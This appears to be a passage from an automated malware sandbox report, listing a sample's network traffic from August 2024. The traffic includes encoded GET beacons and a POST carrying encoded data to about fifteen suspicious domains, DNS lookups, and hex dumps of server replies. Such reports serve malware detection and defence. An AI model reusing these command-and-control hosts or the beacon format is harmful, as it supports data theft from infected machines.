GET /l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.88nn.pro
GET /t3gh/?Xn70_=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.fontanerourgente.net
GET /zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.onlytradez.club
GET /kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.32wxd.top
GET /f9bc/?Xn70_=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.jaxo.xyz
GET /647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1
  Host: www.xforum.tech
GET /l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.cannulafactory.top
GET /rgqx/?Xn70_=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.ayypromo.shop
GET /qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3m/h5NM1/Dot3Sot4/3V0qZLtTBV8KMhP3aG6aVWI0GSP3d0EJgo= HTTP/1.1
  Host: www.anaidittrich.com
GET /0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.551108k5.shop
GET /gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.datensicherung.email
GET /uhl0/?Xn70_=ncGfyjKG78FJ3RohSJv2gscu+FHk/nvAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI9cbDzTo3eIPvJ/69OYqbKv/aNBrOYFR5SHm/7G6NRslCZscJ8Q0=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.jiyitf.top
GET /7o3y/?mV=ZpN4DLSXOzy8qX&Xn70_=34bWgTnU4AX1gKZpgT03P58mZraF9WQxUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UwsXUXfif+FOOr40nRowl+nZyE3/KMRkY0oHOpy0tGVDF3Z+R9aA= HTTP/1.1
  Host: www.tadalaturbo.online
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-19" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-19"><a href="https://www.facebook.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M12 2C6.5 2 2 6.5 2 12c0 5 3.7 9.1 8.4 9.9v-7H7.9V12h2.5V9.8c0-2.5 1.5-3.9 3.8-3.9 1.1 0 2.2.2 2.2.2v2.5h-1.3c-1.2 0-1.6.8-1.6 1.6V12h2.8l-.4 2.9h-2.3v7C18.3 21.1 22 17 22 12c0-5.5-4.5-10-10-10z"></path></svg><span class="screen-reader-text">Facebook</a></li> equals www.facebook.com (Facebook)
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li id="menu-item-20" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20"><a href="https://twitter.com/wordpress"><svg class="svg-icon" width="24" height="24" aria-hidden="true" role="img" focusable="false" width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M22.23,5.924c-0.736,0.326-1.527,0.547-2.357,0.646c0.847-0.508,1.498-1.312,1.804-2.27 c-0.793,0.47-1.671,0.812-2.606,0.996C18.324,4.498,17.257,4,16.077,4c-2.266,0-4.103,1.837-4.103,4.103 c0,0.322,0.036,0.635,0.106,0.935C8.67,8.867,5.647,7.234,3.623,4.751C3.27,5.357,3.067,6.062,3.067,6.814 c0,1.424,0.724,2.679,1.825,3.415c-0.673-0.021-1.305-0.206-1.859-0.513c0,0.017,0,0.034,0,0.052c0,1.988,1.414,3.647,3.292,4.023 c-0.344,0.094-0.707,0.144-1.081,0.144c-0.264,0-0.521-0.026-0.772-0.074c0.522,1.63,2.038,2.816,3.833,2.85 c-1.404,1.1-3.174,1.756-5.096,1.756c-0.331,0-0.658-0.019-0.979-0.057c1.816,1.164,3.973,1 equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: www.weep.site
            Source: global trafficDNS traffic detected: DNS query: www.88nn.pro
            Source: global trafficDNS traffic detected: DNS query: www.fontanerourgente.net
            Source: global trafficDNS traffic detected: DNS query: www.onlytradez.club
            Source: global trafficDNS traffic detected: DNS query: www.32wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.jaxo.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xforum.tech
            Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
            Source: global trafficDNS traffic detected: DNS query: www.taapbit.online
            Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
            Source: global trafficDNS traffic detected: DNS query: www.anaidittrich.com
            Source: global trafficDNS traffic detected: DNS query: www.551108k5.shop
            Source: global trafficDNS traffic detected: DNS query: www.datensicherung.email
            Source: global trafficDNS traffic detected: DNS query: www.jiyitf.top
            Source: global trafficDNS traffic detected: DNS query: www.tadalaturbo.online
            Source: unknownHTTP traffic detected: POST /l4rw/ HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.88nn.proReferer: http://www.88nn.pro/l4rw/Cache-Control: max-age=0Connection: closeContent-Length: 210Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36Data Raw: 58 6e 37 30 5f 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 69 47 68 4a 53 4e 72 53 36 6b 49 6d 7a 30 76 65 48 56 30 36 2f 46 6b 51 35 62 32 37 73 66 34 66 41 62 42 6d 34 71 53 4c 47 35 4d Data Ascii: Xn70_=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:25:54 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 
32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 06:26:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "667cd175-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:26:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:26:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 06:26:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 